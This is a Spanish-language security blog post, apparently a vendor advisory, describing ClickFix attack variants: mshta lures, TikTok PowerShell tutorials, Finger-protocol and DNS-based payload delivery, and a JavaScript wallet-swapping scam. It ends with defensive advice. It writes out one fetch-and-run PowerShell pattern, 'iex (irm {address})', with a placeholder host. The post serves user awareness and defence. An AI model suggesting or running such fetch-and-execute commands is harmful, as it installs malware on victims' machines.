Variaciones del ataque ClickFix

Varios casos de la técnica ClickFix utilizada en ataques del mundo real.

Hace aproximadamente un año, hicimos una publicación sobre la técnica ClickFix, que estaba ganando popularidad entre los atacantes. La esencia de los ataques con ClickFix se reduce a convencer a la víctima, con varios pretextos, de que ejecute un comando malicioso en su equipo. Es decir, desde el punto de vista de las soluciones de ciberseguridad, se ejecuta en nombre del usuario activo y con sus privilegios.

En los primeros usos de esta técnica, los ciberdelincuentes intentaban convencer a las víctimas de que necesitaban ejecutar un comando para solucionar algún problema o pasar un captcha y, en la gran mayoría de los casos, el comando malicioso era un script de PowerShell. Sin embargo, desde entonces, los atacantes han ideado una serie de nuevos trucos sobre los que se debe advertir a los usuarios, así como una serie de nuevas variantes de entrega de carga útil maliciosa, que también vale la pena vigilar.

Uso de mshta.exe

El año pasado, los expertos de Microsoft publicaron un informe sobre ciberataques dirigidos a los propietarios de hoteles que trabajan con Booking.com. Los atacantes enviaron notificaciones falsas del servicio o correos electrónicos que pretendían ser de huéspedes que llamaban la atención sobre una revisión. En ambos casos, el correo electrónico contenía un enlace a un sitio web que imitaba a Booking.com, que le pedía a la víctima que demostrara que no era un robot mediante la ejecución de un código a través del menú Ejecutar.

Hay dos diferencias clave entre este ataque y ClickFix. Primero, no se le pide al usuario que copie la cadena (después de todo, una cadena con código a veces despierta sospechas). El sitio malicioso lo copia al búfer de intercambio, probablemente cuando el usuario hace clic en una casilla de verificación que imita el mecanismo reCAPTCHA. En segundo lugar, la cadena maliciosa llama a la utilidad legítima mshta.exe, que sirve para ejecutar aplicaciones escritas en HTML. Se pone en contacto con el servidor de los atacantes y ejecuta la carga útil maliciosa.

Vídeo en TikTok y PowerShell con privilegios de administrador

En octubre de 2025, BleepingComputer publicó un artículo sobre una campaña que difunde malware a través de instrucciones en vídeos de TikTok. Los vídeos imitan vídeos tutoriales sobre cómo activar software patentado de forma gratuita. El consejo que dan se reduce a la necesidad de ejecutar PowerShell con derechos de administrador y luego ejecutar el comando iex (irm {address}). Aquí, el comando irm descarga un script malicioso de un servidor controlado por atacantes y el comando iex (Invoke-Expression) lo ejecuta. El script, a su vez, descarga un malware de robo de información al equipo de la víctima.

Uso del protocolo Finger

Otra variante inusual del ataque ClickFix usa el conocido truco de captcha, pero el script malicioso usa el protocolo Finger desactualizado. La utilidad del mismo nombre permite a cualquiera solicitar datos sobre un usuario específico en un servidor remoto. El protocolo se usa raramente hoy en día, pero aún es compatible con Windows, macOS y varios sistemas basados en Linux.

Se persuade al usuario para que abra la interfaz de línea de comandos y la use para ejecutar un comando que establece una conexión a través del protocolo Finger (mediante el uso del puerto TCP 79) con el servidor de los atacantes. El protocolo solo transfiere información de texto, pero esto es suficiente para descargar otro script en el equipo de la víctima, que luego instala el malware.

Variante CrashFix

Otra variante de ClickFix se diferencia en que utiliza una ingeniería social más sofisticada. Se utilizó en un ataque a usuarios que intentaban encontrar una herramienta para bloquear banners publicitarios, rastreadores, malware y otro contenido no deseado en páginas web. Al buscar una extensión adecuada para Google Chrome, las víctimas encontraron algo llamado NexShield – Advanced Web Guardian, que en realidad era un clon de un software legítimo en funcionamiento, pero que en cierto momento bloqueaba el navegador y mostraba una notificación falsa sobre un problema de seguridad detectado y la necesidad de ejecutar un “análisis” para corregir el error. Si el usuario aceptaba, recibía instrucciones sobre cómo abrir el menú Ejecutar y ejecutar un comando que la extensión había copiado previamente en el portapapeles.

El comando copió el archivo finger.exe familiar en un directorio temporal, lo renombró ct.exe y luego lo lanzó con la dirección del atacante. El resto del ataque fue el mismo que en el caso antes mencionado. En respuesta a la solicitud del protocolo Finger, se entregó un script malicioso, que lanzó e instaló un troyano de acceso remoto (en este caso, ModeloRAT).

Entrega de malware mediante búsqueda de DNS

El equipo de Inteligencia frente a Amenazas de Microsoft también compartió una variante de ataque de ClickFix un poco más compleja de lo habitual. Desafortunadamente, no describieron el truco de la ingeniería social, pero el método de entregar la carga útil maliciosa es bastante interesante. Probablemente para complicar la detección del ataque en un entorno corporativo y prolongar la vida de la infraestructura maliciosa, los atacantes utilizaron un paso adicional: contactar a un servidor DNS controlado por los atacantes.

Es decir, después de que se persuade de alguna manera a la víctima para que copie y ejecute un comando malicioso, se envía una solicitud al servidor DNS en nombre del usuario a través de la utilidad nslookup legítima, donde se solicitan datos para el dominio example.com. El comando contenía la dirección de un servidor DNS específico controlado por los atacantes. Este devuelve una respuesta que, entre otras cosas, devuelve una cadena con un script malicioso, que a su vez descarga la carga útil final (en este ataque, ModeloRAT nuevamente).

Cebo de criptomonedas y JavaScript como carga útil

La siguiente variante de ataque es interesante por su ingeniería social de múltiples etapas. En los comentarios sobre Pastebin, los atacantes difundieron activamente un mensaje sobre un supuesto fallo en el servicio de intercambio de criptomonedas Swapzone.io. Se invitaba a los propietarios de criptomonedas a visitar un recurso creado por estafadores, que contenía instrucciones completas sobre cómo aprovechar esta vulnerabilidad, que podía generar hasta 13 000 USD en un par de días.

Las instrucciones explican cómo se pueden aprovechar los fallos del servicio para intercambiar criptomonedas a una tasa más favorable. Para hacer esto, la víctima debe abrir el sitio web del servicio en el navegador Chrome, escribir manualmente “javascript:” en la barra de direcciones y, luego, pegar el script de JavaScript copiado del sitio web de los atacantes y ejecutarlo. En realidad, por supuesto, el script no puede afectar a los tipos de cambio de ninguna manera; simplemente reemplaza las direcciones de la cartera Bitcoin y, si la víctima realmente intenta intercambiar algo, transfiere los fondos a las cuentas de los atacantes.

Cómo proteger tu empresa de los ataques ClickFix

Los ataques más simples que utilizan la técnica ClickFix pueden contrarrestarse bloqueando la combinación de teclas [Win]+ [R] en dispositivos de trabajo. Pero, como vemos en los ejemplos enumerados, este está lejos de ser el único tipo de ataque en el que se solicita a los usuarios que ejecuten ellos mismos códigos maliciosos.

Por ello, el principal consejo es concienciar a los empleados sobre la ciberseguridad. Deben comprender claramente que si alguien les pide que realicen manipulaciones inusuales en el sistema o copien y peguen código en algún lugar, en la mayoría de los casos se trata de una estafa utilizada por los ciberdelincuentes. La formación en concienciación sobre seguridad se puede organizar a través de Kaspersky Automated Security Awareness Platform.

Además, para protegerte contra estos ciberataques, te recomendamos lo siguiente:

Consejos
  • Para el resto de países